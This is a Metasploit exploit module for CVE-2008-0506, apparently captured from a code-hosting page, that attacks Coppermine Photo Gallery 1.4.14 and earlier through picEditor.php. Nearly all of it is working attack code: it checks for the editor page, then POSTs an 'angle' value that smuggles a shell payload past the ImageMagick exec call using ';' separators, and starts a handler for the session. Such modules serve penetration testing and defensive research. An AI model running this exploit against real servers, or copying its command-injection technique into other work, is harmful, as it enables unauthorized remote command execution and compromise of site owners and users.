Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/webapp/coppermine_piceditor.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(update_info(info,12'Name' => 'Coppermine Photo Gallery picEditor.php Command Execution',13'Description' => %q{14This module exploits a vulnerability in the picEditor.php script of15Coppermine Photo Gallery versions 1.4.14 and earlier. When configured to16use the ImageMagick library, the 'quality', 'angle', and 'clipval'17parameters are not properly escaped before being passed to the PHP18'exec' command.1920In order to reach the vulnerable 'exec' call, the input must pass21several validation steps.2223The vulnerabilities actually reside in the following functions:2425image_processor.php: rotate_image(...)26include/imageObjectIM.class.php: imageObject::cropImage(...)27include/imageObjectIM.class.php: imageObject::rotateImage(...)28include/imageObjectIM.class.php: imageObject::resizeImage(...)29include/picmgmt.inc.php: resize_image(...)3031NOTE: Use of the ImageMagick library is a non-default option. However, a32user can specify its use at installation time.33},34'Author' =>35[36'Janek Vind', # original discovery/exploit37'jduck' # metasploit version38],39'License' => MSF_LICENSE,40'References' =>41[42[ 'CVE', '2008-0506' ],43[ 'OSVDB', '41676' ],44[ 'EDB', '5019' ],45[ 'URL', 'http://forum.coppermine-gallery.net/index.php?topic=50103.0' ]46],47'Privileged' => true, # web server context48'Payload' =>49{50'DisableNops' => true,51'BadChars' => '\'', # input gets passed to htmlentities52'Space' => 1024,53},54'Platform' => [ 'unix' ],55'Arch' => ARCH_CMD,56'Targets' => [[ 'Automatic', { }]],57'DisclosureDate' => '2008-01-30',58'DefaultTarget' => 0))5960register_options(61[62OptString.new('URI', [ true, "Coppermine directory path", "/cpg1414" ]),63])64end6566def check67res = send_request_raw({68'uri' => normalize_uri(datastore['URI'], '/picEditor.php')69}, 25)7071if (res and res.body =~ /Coppermine Picture Editor/i)72return Exploit::CheckCode::Appears73end7475return Exploit::CheckCode::Safe76end777879def exploit8081valid_imgs = %w{thumb_audio.jpg thumb_avi.jpg thumb_doc.jpg thumb_document.jpg thumb_gz.jpg82thumb_htm.jpg thumb_html.jpg thumb_mid.jpg thumb_midi.jpg thumb_mov.jpg thumb_movie.jpg83thumb_mp3.jpg thumb_mpeg.jpg thumb_mpg.jpg thumb_nopic.jpg thumb_ogg.jpg thumb_pdf.jpg84thumb_private.jpg thumb_qtv.jpg thumb_ra.jpg thumb_ram.jpg thumb_rar.jpg thumb_rm.jpg85thumb_rmj.jpg thumb_swf.jpg thumb_txt.jpg thumb_wav.jpg thumb_wma.jpg thumb_wmv.jpg86thumb_xls.jpg thumb_zip.jpg}87img = '../../images/' + valid_imgs[rand(valid_imgs.length)]88# suppress errors from convert89angle = rand_text_numeric(1+rand(8)) + ' -quiet 1 2'90# and exec our cmd :)91angle += ';' + payload.encoded + ';#'9293res = send_request_cgi({94'method' => 'POST',95'uri' => normalize_uri(datastore['URI'], "/picEditor.php"),96'vars_post' =>97{98'angle' => angle,99'quality' => '50', # not required, but fixes an error message100'newimage' => img101}102}, 25)103104if (res and res.code == 200)105print_good("Successfully POST'd exploit data")106else107fail_with(Failure::Unknown, "Error POSTing exploit data")108end109110handler111end112end113114115